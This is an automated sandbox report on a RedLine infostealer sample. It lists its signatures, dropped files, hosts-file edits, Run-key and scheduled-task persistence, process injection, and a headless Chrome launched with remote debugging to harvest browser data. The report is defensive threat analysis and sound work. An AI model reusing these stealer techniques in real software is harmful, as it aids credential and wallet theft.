Malware Analysis Report

2025-01-18 07:59

Sample ID 230812-kd64jach7z
Target 246580aed9d35564ddba5061b5ce2293a7daadd4f4dc4e8ec393130eea2a3469
SHA256 246580aed9d35564ddba5061b5ce2293a7daadd4f4dc4e8ec393130eea2a3469
Tags redline, logsdiller cloud (tg: @logsdillabot), evasion, infostealer, persistence, spyware, stealer, themida
Score 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score

10/10

SHA256

246580aed9d35564ddba5061b5ce2293a7daadd4f4dc4e8ec393130eea2a3469

Threat Level: Known bad

The file 246580aed9d35564ddba5061b5ce2293a7daadd4f4dc4e8ec393130eea2a3469 was found to be: Known bad.

Malicious Activity Summary

redline, logsdiller cloud (tg: @logsdillabot), evasion, infostealer, persistence, spyware, stealer, themida

Suspicious use of NtCreateUserProcessOtherParentProcess

RedLine

Downloads MZ/PE file

Stops running service(s)

Drops file in Drivers directory

Reads user/profile data of web browsers

Executes dropped EXE

Themida packer

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Program crash

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-12 08:30

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-12 08:30

Reported

2023-08-12 08:32

Platform

win10-20230703-en

Max time kernel

149s

Max time network

156s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Stops running service(s)

evasion

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1148472871-1113856141-1322182616-1000\Software\Microsoft\Windows\CurrentVersion\Run\AppLaunch = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe\"" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4940 set thread context of 4532 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4028 set thread context of 2952 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 4028 set thread context of 2652 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A (×2)

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\246580aed9d35564ddba5061b5ce2293a7daadd4f4dc4e8ec393130eea2a3469.exe N/A (×3)
N/A N/A C:\Windows\Temp\setup.exe N/A (×2)
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (×4)
N/A N/A C:\Windows\Temp\setup.exe N/A (×6)
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (×4)
N/A N/A C:\Windows\Temp\setup.exe N/A (×2)
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A (×2)
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (×3)
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A (×6)
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (×3)
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A (×3)
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A (×2)
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A (×6)
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A (×2)
N/A N/A C:\Windows\explorer.exe N/A (×16)

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\246580aed9d35564ddba5061b5ce2293a7daadd4f4dc4e8ec393130eea2a3469.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3812 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\246580aed9d35564ddba5061b5ce2293a7daadd4f4dc4e8ec393130eea2a3469.exe C:\Users\Admin\AppData\Local\Temp\mi.exe (×3)
PID 3812 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\246580aed9d35564ddba5061b5ce2293a7daadd4f4dc4e8ec393130eea2a3469.exe C:\Users\Admin\AppData\Local\Temp\cli.exe (×3)
PID 3812 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\246580aed9d35564ddba5061b5ce2293a7daadd4f4dc4e8ec393130eea2a3469.exe C:\Users\Admin\AppData\Local\Temp\cc.exe (×3)
PID 4584 wrote to memory of 700 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe (×2)
PID 4564 wrote to memory of 4580 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe (×2)
PID 4580 wrote to memory of 4720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe (×2)
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe (×40)
PID 4580 wrote to memory of 4536 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 4536 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 3700 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 3700 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 3700 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 3700 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 3700 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 3700 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 3700 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\246580aed9d35564ddba5061b5ce2293a7daadd4f4dc4e8ec393130eea2a3469.exe

"C:\Users\Admin\AppData\Local\Temp\246580aed9d35564ddba5061b5ce2293a7daadd4f4dc4e8ec393130eea2a3469.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=63516 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff987329758,0x7ff987329768,0x7ff987329778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1256 --field-trial-handle=1388,i,6264700549726101065,1029694166062952978,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1556 --field-trial-handle=1388,i,6264700549726101065,1029694166062952978,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

